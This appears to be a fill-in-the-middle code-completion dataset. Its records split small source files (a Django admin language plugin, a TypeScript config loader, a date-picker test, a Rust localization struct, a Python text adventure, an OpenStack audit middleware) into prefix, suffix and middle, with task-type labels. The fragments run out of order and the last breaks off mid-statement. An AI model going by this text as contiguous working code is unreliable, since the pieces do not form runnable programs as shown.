if 'nav_menu' in request.session:
del request.session['nav_menu']
return set_language(request)
if settings.LANGUAGES and 'django.middleware.locale.LocaleMiddleware' in settings.MIDDLEWARE_CLASSES:
| site.register_plugin(SetLangNavPlugin, CommAdminView)
site.register_view(r'^i18n/setlang/$', SetLangView, 'set_language') | conditional_block |
|
language.py | from django.conf import settings
from django.template import loader
from django.views.i18n import set_language
from xadmin.plugins.utils import get_context_dict
from xadmin.sites import site
from xadmin.views import BaseAdminPlugin, CommAdminView, BaseAdminView
class SetLangNavPlugin(BaseAdminPlugin):
def block_top_navmenu(self, context, nodes): |
def post(self, request, *args, **kwargs):
if 'nav_menu' in request.session:
del request.session['nav_menu']
return set_language(request)
if settings.LANGUAGES and 'django.middleware.locale.LocaleMiddleware' in settings.MIDDLEWARE_CLASSES:
site.register_plugin(SetLangNavPlugin, CommAdminView)
site.register_view(r'^i18n/setlang/$', SetLangView, 'set_language') | context = get_context_dict(context)
context['redirect_to'] = self.request.get_full_path()
nodes.append(loader.render_to_string('xadmin/blocks/comm.top.setlang.html', context=context))
class SetLangView(BaseAdminView): | random_line_split |
user_configuration.ts | ///<reference path="../typings/node/node.d.ts" />
import fs = require('fs');
import path = require("path");
import utils = require('./utils');
var Promise = require("promise");
export class UserConfiguration {
fontColor: string;
fontsize: number;
backgroundColor: string;
fontFamily: string;
constructor(args: any = {}) {
this.defaults();
this.fontsize = args.fontsize || this.fontsize;
this.fontColor = args.fontColor || this.fontColor;
this.backgroundColor = args.backgroundColor || this.backgroundColor;
this.fontFamily = args.fontFamily || this.fontFamily;
}
private defaults() {
this.backgroundColor = "#0B1D2E";
this.fontColor = "#FCFDF2";
this.fontsize = 19;
this.fontFamily = 'courier';
}
}
export function loadConfiguration() {
return readFile(path.join(utils.getUserHome(), ".jstermrc"))
.then((contents) => { return Promise.resolve(JSON.parse(contents)); })
.then((configObj) => {
return Promise.resolve(new UserConfiguration(configObj))
})
.catch((err) => {
console.error(err);
return new UserConfiguration();
})
}
function readFile(filename: string) {
return new Promise(function(resolve, reject) {
fs.readFile(filename, (err,content) => {
if(err) {
return reject(err);
} else |
});
});
}
| {
resolve(content.toString());
} | conditional_block |
user_configuration.ts | ///<reference path="../typings/node/node.d.ts" />
import fs = require('fs');
import path = require("path");
import utils = require('./utils');
var Promise = require("promise");
export class UserConfiguration {
fontColor: string;
fontsize: number;
backgroundColor: string;
fontFamily: string;
constructor(args: any = {}) {
this.defaults();
this.fontsize = args.fontsize || this.fontsize;
this.fontColor = args.fontColor || this.fontColor;
this.backgroundColor = args.backgroundColor || this.backgroundColor;
this.fontFamily = args.fontFamily || this.fontFamily;
}
private defaults() {
this.backgroundColor = "#0B1D2E";
this.fontColor = "#FCFDF2";
this.fontsize = 19;
this.fontFamily = 'courier';
}
}
export function loadConfiguration() {
return readFile(path.join(utils.getUserHome(), ".jstermrc"))
.then((contents) => { return Promise.resolve(JSON.parse(contents)); })
.then((configObj) => {
return Promise.resolve(new UserConfiguration(configObj))
})
.catch((err) => {
console.error(err);
return new UserConfiguration();
}) | function readFile(filename: string) {
return new Promise(function(resolve, reject) {
fs.readFile(filename, (err,content) => {
if(err) {
return reject(err);
} else {
resolve(content.toString());
}
});
});
} | }
| random_line_split |
user_configuration.ts | ///<reference path="../typings/node/node.d.ts" />
import fs = require('fs');
import path = require("path");
import utils = require('./utils');
var Promise = require("promise");
export class | {
fontColor: string;
fontsize: number;
backgroundColor: string;
fontFamily: string;
constructor(args: any = {}) {
this.defaults();
this.fontsize = args.fontsize || this.fontsize;
this.fontColor = args.fontColor || this.fontColor;
this.backgroundColor = args.backgroundColor || this.backgroundColor;
this.fontFamily = args.fontFamily || this.fontFamily;
}
private defaults() {
this.backgroundColor = "#0B1D2E";
this.fontColor = "#FCFDF2";
this.fontsize = 19;
this.fontFamily = 'courier';
}
}
export function loadConfiguration() {
return readFile(path.join(utils.getUserHome(), ".jstermrc"))
.then((contents) => { return Promise.resolve(JSON.parse(contents)); })
.then((configObj) => {
return Promise.resolve(new UserConfiguration(configObj))
})
.catch((err) => {
console.error(err);
return new UserConfiguration();
})
}
function readFile(filename: string) {
return new Promise(function(resolve, reject) {
fs.readFile(filename, (err,content) => {
if(err) {
return reject(err);
} else {
resolve(content.toString());
}
});
});
}
| UserConfiguration | identifier_name |
range-min-max.test.tsx | import React from 'react';
import { render } from '@testing-library/react';
import { clickDay } from 'react-day-picker/test/actions';
import { getAllEnabledDays, getDayButton } from 'react-day-picker/test/po';
import { freezeBeforeAll } from 'react-day-picker/test/utils';
import Example from '@examples/range-min-max';
const today = new Date(2021, 10, 15);
freezeBeforeAll(today);
beforeEach(() => {
render(<Example />);
});
describe('when the first day is clicked', () => {
const fromDay = new Date(2021, 10, 15);
beforeEach(() => clickDay(fromDay));
test('should disable before the allowed range', () => {
expect(getAllEnabledDays()[0]).toHaveTextContent('11th');
});
test('should disable after the allowed range', () => {
const enabledDays = getAllEnabledDays();
expect(enabledDays[enabledDays.length - 1]).toHaveTextContent('19th');
});
describe('when clicking a day after the from date', () => {
const toDay = new Date(2021, 10, 17);
const expectedSelectedDays = [
new Date(2021, 10, 15),
new Date(2021, 10, 16),
new Date(2021, 10, 17)
];
beforeEach(() => clickDay(toDay));
test.each(expectedSelectedDays)('%s should be selected', (day) => {
expect(getDayButton(day)).toHaveAttribute('aria-pressed', 'true');
}); | });
});
describe('when clicking a day before the from date', () => {
const toDay = new Date(2021, 10, 11);
const expectedSelectedDays = [
new Date(2021, 10, 11),
new Date(2021, 10, 12),
new Date(2021, 10, 13),
new Date(2021, 10, 14),
new Date(2021, 10, 15)
];
beforeEach(() => clickDay(toDay));
test.each(expectedSelectedDays)('%s should be selected', (day) => {
expect(getDayButton(day)).toHaveAttribute('aria-pressed', 'true');
});
});
}); | test('should enable the days up to the clicked day', () => {
const enabledDays = getAllEnabledDays();
expect(enabledDays[enabledDays.length - 1]).toHaveTextContent('19th'); | random_line_split |
context.rs | // Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
use language_tags::LanguageTag;
use std::fmt;
use {Args, Message};
/// Contextual configuration data.
#[derive(Clone, Debug)]
pub struct Context {
/// The language being localized for.
pub language_tag: LanguageTag,
/// The value to use in a `PlaceholderFormat`.
pub placeholder_value: Option<i64>,
}
impl Context {
/// Create a new instance of `Context`.
pub fn new(language: LanguageTag, placeholder_value: Option<i64>) -> Self {
Context {
language_tag: language,
placeholder_value: placeholder_value,
}
}
/// Format a message, returning a string.
pub fn | <'f>(&self, message: &Message, args: Option<&Args<'f>>) -> String {
let mut output = String::new();
let _ = message.write_message(self, &mut output, args);
output
}
/// Write a message to a stream.
pub fn write<'f>(
&self,
message: &Message,
stream: &mut fmt::Write,
args: Option<&Args<'f>>,
) -> fmt::Result {
message.write_message(self, stream, args)
}
}
impl Default for Context {
fn default() -> Self {
Context {
language_tag: Default::default(),
placeholder_value: None,
}
}
}
| format | identifier_name |
context.rs | // Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
use language_tags::LanguageTag;
use std::fmt;
use {Args, Message};
/// Contextual configuration data.
#[derive(Clone, Debug)]
pub struct Context {
/// The language being localized for.
pub language_tag: LanguageTag,
/// The value to use in a `PlaceholderFormat`.
pub placeholder_value: Option<i64>,
}
impl Context {
/// Create a new instance of `Context`.
pub fn new(language: LanguageTag, placeholder_value: Option<i64>) -> Self {
Context {
language_tag: language,
placeholder_value: placeholder_value,
}
}
/// Format a message, returning a string.
pub fn format<'f>(&self, message: &Message, args: Option<&Args<'f>>) -> String {
let mut output = String::new();
let _ = message.write_message(self, &mut output, args);
output
}
/// Write a message to a stream.
pub fn write<'f>(
&self,
message: &Message,
stream: &mut fmt::Write,
args: Option<&Args<'f>>,
) -> fmt::Result |
}
impl Default for Context {
fn default() -> Self {
Context {
language_tag: Default::default(),
placeholder_value: None,
}
}
}
| {
message.write_message(self, stream, args)
} | identifier_body |
context.rs | // Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
use language_tags::LanguageTag;
use std::fmt;
use {Args, Message};
/// Contextual configuration data.
#[derive(Clone, Debug)]
pub struct Context {
/// The language being localized for.
pub language_tag: LanguageTag,
/// The value to use in a `PlaceholderFormat`.
pub placeholder_value: Option<i64>,
}
impl Context {
/// Create a new instance of `Context`.
pub fn new(language: LanguageTag, placeholder_value: Option<i64>) -> Self {
Context {
language_tag: language,
placeholder_value: placeholder_value,
}
}
/// Format a message, returning a string.
pub fn format<'f>(&self, message: &Message, args: Option<&Args<'f>>) -> String {
let mut output = String::new();
let _ = message.write_message(self, &mut output, args);
output |
/// Write a message to a stream.
pub fn write<'f>(
&self,
message: &Message,
stream: &mut fmt::Write,
args: Option<&Args<'f>>,
) -> fmt::Result {
message.write_message(self, stream, args)
}
}
impl Default for Context {
fn default() -> Self {
Context {
language_tag: Default::default(),
placeholder_value: None,
}
}
} | } | random_line_split |
ex31.py | print "You enter a dark room with two doors. Do you go through door #1 or door #2?"
door = raw_input("> ")
| print "2. Scream at the bear."
bear = raw_input("> ")
if bear == "1":
print "The bear eats your face off. Good job!"
elif bear == "2":
print "The bear eats your legs off. Good job!"
else:
print "Well, doing %s is probably better. Bear runs away." %bear
elif door =="2":
print "You stare into the endless abyss at Cthulhu's retina."
print "1. Blueberries."
print "2. Yellow jacket clothespins."
print "3. Understanding revolvers yelling melodies."
insanity = raw_input("> ")
if insanity == "1" or insanity =="2":
print "Your body survives powered by a mind of jello. Good job!"
else:
print "The insanity rots your eyes into a pool of muck. Good job!"
else:
print "You stumble around and fall on a knife and die. Good job!" | if door == "1":
print "There`s a giant bear here eating a chees cake. What do you do?"
print "1. Take the cake." | random_line_split |
ex31.py | print "You enter a dark room with two doors. Do you go through door #1 or door #2?"
door = raw_input("> ")
if door == "1":
print "There`s a giant bear here eating a chees cake. What do you do?"
print "1. Take the cake."
print "2. Scream at the bear."
bear = raw_input("> ")
if bear == "1":
|
elif bear == "2":
print "The bear eats your legs off. Good job!"
else:
print "Well, doing %s is probably better. Bear runs away." %bear
elif door =="2":
print "You stare into the endless abyss at Cthulhu's retina."
print "1. Blueberries."
print "2. Yellow jacket clothespins."
print "3. Understanding revolvers yelling melodies."
insanity = raw_input("> ")
if insanity == "1" or insanity =="2":
print "Your body survives powered by a mind of jello. Good job!"
else:
print "The insanity rots your eyes into a pool of muck. Good job!"
else:
print "You stumble around and fall on a knife and die. Good job!" | print "The bear eats your face off. Good job!" | conditional_block |
api.py | # -*- encoding: utf-8 -*-
#
# Copyright 2013 IBM Corp.
#
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ast
import ConfigParser
import os
from oslo.config import cfg
import urlparse
from pycadf import cadftaxonomy as taxonomy
from pycadf import cadftype
from pycadf import credential
from pycadf import endpoint
from pycadf import eventfactory as factory
from pycadf import host
from pycadf import identifier
from pycadf import reason
from pycadf import reporterstep
from pycadf import resource
from pycadf import tag
from pycadf import timestamp
CONF = cfg.CONF
opts = [
cfg.StrOpt('api_audit_map',
default='api_audit_map.conf',
help='File containing mapping for api paths and '
'service endpoints'),
]
CONF.register_opts(opts, group='audit')
class ClientResource(resource.Resource):
def __init__(self, project_id=None, **kwargs):
super(ClientResource, self).__init__(**kwargs)
if project_id is not None:
self.project_id = project_id
class KeystoneCredential(credential.Credential):
def __init__(self, identity_status=None, **kwargs):
super(KeystoneCredential, self).__init__(**kwargs)
if identity_status is not None:
self.identity_status = identity_status
class PycadfAuditApiConfigError(Exception):
"""Error raised when pyCADF fails to configure correctly."""
class OpenStackAuditApi(object):
_API_PATHS = []
_BODY_ACTIONS = {}
_SERVICE_ENDPOINTS = {}
def __init__(self):
self._configure_audit_map()
def _configure_audit_map(self):
"""Configure to recognize and map known api paths."""
cfg_file = CONF.audit.api_audit_map
if not os.path.exists(CONF.audit.api_audit_map):
cfg_file = cfg.CONF.find_file(CONF.audit.api_audit_map)
if cfg_file:
try:
audit_map = ConfigParser.SafeConfigParser()
audit_map.readfp(open(cfg_file))
try:
paths = audit_map.get('DEFAULT', 'api_paths')
self._API_PATHS = paths.lstrip().split('\n')
except ConfigParser.NoSectionError:
pass
try:
self._BODY_ACTIONS = dict(audit_map.items('body_actions'))
except ConfigParser.NoSectionError:
pass
try:
self._SERVICE_ENDPOINTS = \
dict(audit_map.items('service_endpoints'))
except ConfigParser.NoSectionError:
pass
except ConfigParser.ParsingError as err:
raise PycadfAuditApiConfigError(
'Error parsing audit map file: %s' % err)
def _get_action(self, req):
"""Take a given Request, parse url path to calculate action type.
Depending on req.method:
if POST: path ends with action, read the body and get action from map;
request ends with known path, assume is create action;
request ends with unknown path, assume is update action.
if GET: request ends with known path, assume is list action;
request ends with unknown path, assume is read action.
if PUT, assume update action.
if DELETE, assume delete action.
if HEAD, assume read action.
"""
path = urlparse.urlparse(req.url).path
path = path[:-1] if path.endswith('/') else path
method = req.method
if method == 'POST':
if path[path.rfind('/') + 1:] == 'action':
if req.json:
body_action = req.json.keys()[0]
action = self._BODY_ACTIONS.get(body_action,
taxonomy.ACTION_CREATE)
else:
action = taxonomy.ACTION_CREATE
elif path[path.rfind('/') + 1:] not in self._API_PATHS:
action = taxonomy.ACTION_UPDATE
else:
action = taxonomy.ACTION_CREATE
elif method == 'GET':
if path[path.rfind('/') + 1:] in self._API_PATHS:
action = taxonomy.ACTION_LIST | action = taxonomy.ACTION_DELETE
elif method == 'HEAD':
action = taxonomy.ACTION_READ
else:
action = taxonomy.UNKNOWN
return action
def create_event(self, req, correlation_id):
action = self._get_action(req)
initiator_host = host.Host(address=req.client_addr,
agent=req.user_agent)
catalog = ast.literal_eval(req.environ['HTTP_X_SERVICE_CATALOG'])
for endp in catalog:
admin_urlparse = urlparse.urlparse(
endp['endpoints'][0]['adminURL'])
public_urlparse = urlparse.urlparse(
endp['endpoints'][0]['publicURL'])
req_url = urlparse.urlparse(req.host_url)
if (req_url.netloc == admin_urlparse.netloc
or req_url.netloc == public_urlparse.netloc):
service_type = self._SERVICE_ENDPOINTS.get(endp['type'],
taxonomy.UNKNOWN)
service_name = endp['name']
admin_end = endpoint.Endpoint(
name='admin',
url=endp['endpoints'][0]['adminURL'])
private_end = endpoint.Endpoint(
name='private',
url=endp['endpoints'][0]['internalURL'])
public_end = endpoint.Endpoint(
name='public',
url=endp['endpoints'][0]['publicURL'])
service_id = endp['endpoints'][0]['id']
break
else:
service_type = service_id = service_name = taxonomy.UNKNOWN
admin_end = private_end = public_end = None
initiator = ClientResource(
typeURI=taxonomy.ACCOUNT_USER,
id=str(req.environ['HTTP_X_USER_ID']),
name=req.environ['HTTP_X_USER_NAME'],
host=initiator_host,
credential=KeystoneCredential(
token=req.environ['HTTP_X_AUTH_TOKEN'],
identity_status=req.environ['HTTP_X_IDENTITY_STATUS']),
project_id=req.environ['HTTP_X_PROJECT_ID'])
target = resource.Resource(typeURI=service_type,
id=service_id,
name=service_name)
if admin_end:
target.add_address(admin_end)
if private_end:
target.add_address(private_end)
if public_end:
target.add_address(public_end)
event = factory.EventFactory().new_event(
eventType=cadftype.EVENTTYPE_ACTIVITY,
outcome=taxonomy.OUTCOME_PENDING,
action=action,
initiator=initiator,
target=target,
observer='target')
event.add_tag(tag.generate_name_value_tag('correlation_id',
correlation_id))
return event
def append_audit_event(self, req):
"""Append a CADF event to req.environ['CADF_EVENT']
Also, stores model in request for future process and includes a
CADF correlation id.
"""
correlation_id = identifier.generate_uuid()
req.environ['CADF_EVENT_CORRELATION_ID'] = correlation_id
event = self.create_event(req, correlation_id)
setattr(req, 'cadf_model', event)
req.environ['CADF_EVENT'] = event.as_dict()
def mod_audit_event(self, req, response):
"""Modifies CADF event in request based on response.
If no event exists, a new event is created.
"""
if response:
if response.status_int >= 200 and response.status_int < 400:
result = taxonomy.OUTCOME_SUCCESS
else:
result = taxonomy.OUTCOME_FAILURE
else:
result = taxonomy.UNKNOWN
if hasattr(req, 'cadf_model'):
req.cadf_model.add_reporterstep(
reporterstep.Reporterstep(
role=cadftype.REPORTER_ROLE_MODIFIER,
reporter='target',
reporterTime=timestamp.get_utc_now()))
else:
self.append_audit_event(req)
req.cadf_model.outcome = result
if response:
req.cadf_model.reason = \
reason.Reason(reasonType='HTTP',
reasonCode=str(response.status_int))
req.environ['CADF_EVENT'] = req.cadf_model.as_dict() | else:
action = taxonomy.ACTION_READ
elif method == 'PUT':
action = taxonomy.ACTION_UPDATE
elif method == 'DELETE': | random_line_split |
api.py | # -*- encoding: utf-8 -*-
#
# Copyright 2013 IBM Corp.
#
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ast
import ConfigParser
import os
from oslo.config import cfg
import urlparse
from pycadf import cadftaxonomy as taxonomy
from pycadf import cadftype
from pycadf import credential
from pycadf import endpoint
from pycadf import eventfactory as factory
from pycadf import host
from pycadf import identifier
from pycadf import reason
from pycadf import reporterstep
from pycadf import resource
from pycadf import tag
from pycadf import timestamp
CONF = cfg.CONF
opts = [
cfg.StrOpt('api_audit_map',
default='api_audit_map.conf',
help='File containing mapping for api paths and '
'service endpoints'),
]
CONF.register_opts(opts, group='audit')
class ClientResource(resource.Resource):
|
class KeystoneCredential(credential.Credential):
def __init__(self, identity_status=None, **kwargs):
super(KeystoneCredential, self).__init__(**kwargs)
if identity_status is not None:
self.identity_status = identity_status
class PycadfAuditApiConfigError(Exception):
"""Error raised when pyCADF fails to configure correctly."""
class OpenStackAuditApi(object):
_API_PATHS = []
_BODY_ACTIONS = {}
_SERVICE_ENDPOINTS = {}
def __init__(self):
self._configure_audit_map()
def _configure_audit_map(self):
"""Configure to recognize and map known api paths."""
cfg_file = CONF.audit.api_audit_map
if not os.path.exists(CONF.audit.api_audit_map):
cfg_file = cfg.CONF.find_file(CONF.audit.api_audit_map)
if cfg_file:
try:
audit_map = ConfigParser.SafeConfigParser()
audit_map.readfp(open(cfg_file))
try:
paths = audit_map.get('DEFAULT', 'api_paths')
self._API_PATHS = paths.lstrip().split('\n')
except ConfigParser.NoSectionError:
pass
try:
self._BODY_ACTIONS = dict(audit_map.items('body_actions'))
except ConfigParser.NoSectionError:
pass
try:
self._SERVICE_ENDPOINTS = \
dict(audit_map.items('service_endpoints'))
except ConfigParser.NoSectionError:
pass
except ConfigParser.ParsingError as err:
raise PycadfAuditApiConfigError(
'Error parsing audit map file: %s' % err)
def _get_action(self, req):
"""Take a given Request, parse url path to calculate action type.
Depending on req.method:
if POST: path ends with action, read the body and get action from map;
request ends with known path, assume is create action;
request ends with unknown path, assume is update action.
if GET: request ends with known path, assume is list action;
request ends with unknown path, assume is read action.
if PUT, assume update action.
if DELETE, assume delete action.
if HEAD, assume read action.
"""
path = urlparse.urlparse(req.url).path
path = path[:-1] if path.endswith('/') else path
method = req.method
if method == 'POST':
if path[path.rfind('/') + 1:] == 'action':
if req.json:
body_action = req.json.keys()[0]
action = self._BODY_ACTIONS.get(body_action,
taxonomy.ACTION_CREATE)
else:
action = taxonomy.ACTION_CREATE
elif path[path.rfind('/') + 1:] not in self._API_PATHS:
action = taxonomy.ACTION_UPDATE
else:
action = taxonomy.ACTION_CREATE
elif method == 'GET':
if path[path.rfind('/') + 1:] in self._API_PATHS:
action = taxonomy.ACTION_LIST
else:
action = taxonomy.ACTION_READ
elif method == 'PUT':
action = taxonomy.ACTION_UPDATE
elif method == 'DELETE':
action = taxonomy.ACTION_DELETE
elif method == 'HEAD':
action = taxonomy.ACTION_READ
else:
action = taxonomy.UNKNOWN
return action
def create_event(self, req, correlation_id):
action = self._get_action(req)
initiator_host = host.Host(address=req.client_addr,
agent=req.user_agent)
catalog = ast.literal_eval(req.environ['HTTP_X_SERVICE_CATALOG'])
for endp in catalog:
admin_urlparse = urlparse.urlparse(
endp['endpoints'][0]['adminURL'])
public_urlparse = urlparse.urlparse(
endp['endpoints'][0]['publicURL'])
req_url = urlparse.urlparse(req.host_url)
if (req_url.netloc == admin_urlparse.netloc
or req_url.netloc == public_urlparse.netloc):
service_type = self._SERVICE_ENDPOINTS.get(endp['type'],
taxonomy.UNKNOWN)
service_name = endp['name']
admin_end = endpoint.Endpoint(
name='admin',
url=endp['endpoints'][0]['adminURL'])
private_end = endpoint.Endpoint(
name='private',
url=endp['endpoints'][0]['internalURL'])
public_end = endpoint.Endpoint(
name='public',
url=endp['endpoints'][0]['publicURL'])
service_id = endp['endpoints'][0]['id']
break
else:
service_type = service_id = service_name = taxonomy.UNKNOWN
admin_end = private_end = public_end = None
initiator = ClientResource(
typeURI=taxonomy.ACCOUNT_USER,
id=str(req.environ['HTTP_X_USER_ID']),
name=req.environ['HTTP_X_USER_NAME'],
host=initiator_host,
credential=KeystoneCredential(
token=req.environ['HTTP_X_AUTH_TOKEN'],
identity_status=req.environ['HTTP_X_IDENTITY_STATUS']),
project_id=req.environ['HTTP_X_PROJECT_ID'])
target = resource.Resource(typeURI=service_type,
id=service_id,
name=service_name)
if admin_end:
target.add_address(admin_end)
if private_end:
target.add_address(private_end)
if public_end:
target.add_address(public_end)
event = factory.EventFactory().new_event(
eventType=cadftype.EVENTTYPE_ACTIVITY,
outcome=taxonomy.OUTCOME_PENDING,
action=action,
initiator=initiator,
target=target,
observer='target')
event.add_tag(tag.generate_name_value_tag('correlation_id',
correlation_id))
return event
def append_audit_event(self, req):
"""Append a CADF event to req.environ['CADF_EVENT']
Also, stores model in request for future process and includes a
CADF correlation id.
"""
correlation_id = identifier.generate_uuid()
req.environ['CADF_EVENT_CORRELATION_ID'] = correlation_id
event = self.create_event(req, correlation_id)
setattr(req, 'cadf_model', event)
req.environ['CADF_EVENT'] = event.as_dict()
def mod_audit_event(self, req, response):
"""Modifies CADF event in request based on response.
If no event exists, a new event is created.
"""
if response:
if response.status_int >= 200 and response.status_int < 400:
result = taxonomy.OUTCOME_SUCCESS
else:
result = taxonomy.OUTCOME_FAILURE
else:
result = taxonomy.UNKNOWN
if hasattr(req, 'cadf_model'):
req.cadf_model.add_reporterstep(
reporterstep.Reporterstep(
role=cadftype.REPORTER_ROLE_MODIFIER,
reporter='target',
reporterTime=timestamp.get_utc_now()))
else:
self.append_audit_event(req)
req.cadf_model.outcome = result
if response:
req.cadf_model.reason = \
reason.Reason(reasonType='HTTP',
reasonCode=str(response.status_int))
req.environ['CADF_EVENT'] = req.cadf_model.as_dict()
| def __init__(self, project_id=None, **kwargs):
super(ClientResource, self).__init__(**kwargs)
if project_id is not None:
self.project_id = project_id | identifier_body |
api.py | # -*- encoding: utf-8 -*-
#
# Copyright 2013 IBM Corp.
#
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ast
import ConfigParser
import os
from oslo.config import cfg
import urlparse
from pycadf import cadftaxonomy as taxonomy
from pycadf import cadftype
from pycadf import credential
from pycadf import endpoint
from pycadf import eventfactory as factory
from pycadf import host
from pycadf import identifier
from pycadf import reason
from pycadf import reporterstep
from pycadf import resource
from pycadf import tag
from pycadf import timestamp
CONF = cfg.CONF
opts = [
cfg.StrOpt('api_audit_map',
default='api_audit_map.conf',
help='File containing mapping for api paths and '
'service endpoints'),
]
CONF.register_opts(opts, group='audit')
class ClientResource(resource.Resource):
def __init__(self, project_id=None, **kwargs):
super(ClientResource, self).__init__(**kwargs)
if project_id is not None:
self.project_id = project_id
class KeystoneCredential(credential.Credential):
def __init__(self, identity_status=None, **kwargs):
super(KeystoneCredential, self).__init__(**kwargs)
if identity_status is not None:
self.identity_status = identity_status
class PycadfAuditApiConfigError(Exception):
"""Error raised when pyCADF fails to configure correctly."""
class OpenStackAuditApi(object):
_API_PATHS = []
_BODY_ACTIONS = {}
_SERVICE_ENDPOINTS = {}
def __init__(self):
self._configure_audit_map()
def _configure_audit_map(self):
"""Configure to recognize and map known api paths."""
cfg_file = CONF.audit.api_audit_map
if not os.path.exists(CONF.audit.api_audit_map):
cfg_file = cfg.CONF.find_file(CONF.audit.api_audit_map)
if cfg_file:
try:
audit_map = ConfigParser.SafeConfigParser()
audit_map.readfp(open(cfg_file))
try:
paths = audit_map.get('DEFAULT', 'api_paths')
self._API_PATHS = paths.lstrip().split('\n')
except ConfigParser.NoSectionError:
pass
try:
self._BODY_ACTIONS = dict(audit_map.items('body_actions'))
except ConfigParser.NoSectionError:
pass
try:
self._SERVICE_ENDPOINTS = \
dict(audit_map.items('service_endpoints'))
except ConfigParser.NoSectionError:
pass
except ConfigParser.ParsingError as err:
raise PycadfAuditApiConfigError(
'Error parsing audit map file: %s' % err)
def | (self, req):
"""Take a given Request, parse url path to calculate action type.
Depending on req.method:
if POST: path ends with action, read the body and get action from map;
request ends with known path, assume is create action;
request ends with unknown path, assume is update action.
if GET: request ends with known path, assume is list action;
request ends with unknown path, assume is read action.
if PUT, assume update action.
if DELETE, assume delete action.
if HEAD, assume read action.
"""
path = urlparse.urlparse(req.url).path
path = path[:-1] if path.endswith('/') else path
method = req.method
if method == 'POST':
if path[path.rfind('/') + 1:] == 'action':
if req.json:
body_action = req.json.keys()[0]
action = self._BODY_ACTIONS.get(body_action,
taxonomy.ACTION_CREATE)
else:
action = taxonomy.ACTION_CREATE
elif path[path.rfind('/') + 1:] not in self._API_PATHS:
action = taxonomy.ACTION_UPDATE
else:
action = taxonomy.ACTION_CREATE
elif method == 'GET':
if path[path.rfind('/') + 1:] in self._API_PATHS:
action = taxonomy.ACTION_LIST
else:
action = taxonomy.ACTION_READ
elif method == 'PUT':
action = taxonomy.ACTION_UPDATE
elif method == 'DELETE':
action = taxonomy.ACTION_DELETE
elif method == 'HEAD':
action = taxonomy.ACTION_READ
else:
action = taxonomy.UNKNOWN
return action
def create_event(self, req, correlation_id):
action = self._get_action(req)
initiator_host = host.Host(address=req.client_addr,
agent=req.user_agent)
catalog = ast.literal_eval(req.environ['HTTP_X_SERVICE_CATALOG'])
for endp in catalog:
admin_urlparse = urlparse.urlparse(
endp['endpoints'][0]['adminURL'])
public_urlparse = urlparse.urlparse(
endp['endpoints'][0]['publicURL'])
req_url = urlparse.urlparse(req.host_url)
if (req_url.netloc == admin_urlparse.netloc
or req_url.netloc == public_urlparse.netloc):
service_type = self._SERVICE_ENDPOINTS.get(endp['type'],
taxonomy.UNKNOWN)
service_name = endp['name']
admin_end = endpoint.Endpoint(
name='admin',
url=endp['endpoints'][0]['adminURL'])
private_end = endpoint.Endpoint(
name='private',
url=endp['endpoints'][0]['internalURL'])
public_end = endpoint.Endpoint(
name='public',
url=endp['endpoints'][0]['publicURL'])
service_id = endp['endpoints'][0]['id']
break
else:
service_type = service_id = service_name = taxonomy.UNKNOWN
admin_end = private_end = public_end = None
initiator = ClientResource(
typeURI=taxonomy.ACCOUNT_USER,
id=str(req.environ['HTTP_X_USER_ID']),
name=req.environ['HTTP_X_USER_NAME'],
host=initiator_host,
credential=KeystoneCredential(
token=req.environ['HTTP_X_AUTH_TOKEN'],
identity_status=req.environ['HTTP_X_IDENTITY_STATUS']),
project_id=req.environ['HTTP_X_PROJECT_ID'])
target = resource.Resource(typeURI=service_type,
id=service_id,
name=service_name)
if admin_end:
target.add_address(admin_end)
if private_end:
target.add_address(private_end)
if public_end:
target.add_address(public_end)
event = factory.EventFactory().new_event(
eventType=cadftype.EVENTTYPE_ACTIVITY,
outcome=taxonomy.OUTCOME_PENDING,
action=action,
initiator=initiator,
target=target,
observer='target')
event.add_tag(tag.generate_name_value_tag('correlation_id',
correlation_id))
return event
def append_audit_event(self, req):
"""Append a CADF event to req.environ['CADF_EVENT']
Also, stores model in request for future process and includes a
CADF correlation id.
"""
correlation_id = identifier.generate_uuid()
req.environ['CADF_EVENT_CORRELATION_ID'] = correlation_id
event = self.create_event(req, correlation_id)
setattr(req, 'cadf_model', event)
req.environ['CADF_EVENT'] = event.as_dict()
def mod_audit_event(self, req, response):
"""Modifies CADF event in request based on response.
If no event exists, a new event is created.
"""
if response:
if response.status_int >= 200 and response.status_int < 400:
result = taxonomy.OUTCOME_SUCCESS
else:
result = taxonomy.OUTCOME_FAILURE
else:
result = taxonomy.UNKNOWN
if hasattr(req, 'cadf_model'):
req.cadf_model.add_reporterstep(
reporterstep.Reporterstep(
role=cadftype.REPORTER_ROLE_MODIFIER,
reporter='target',
reporterTime=timestamp.get_utc_now()))
else:
self.append_audit_event(req)
req.cadf_model.outcome = result
if response:
req.cadf_model.reason = \
reason.Reason(reasonType='HTTP',
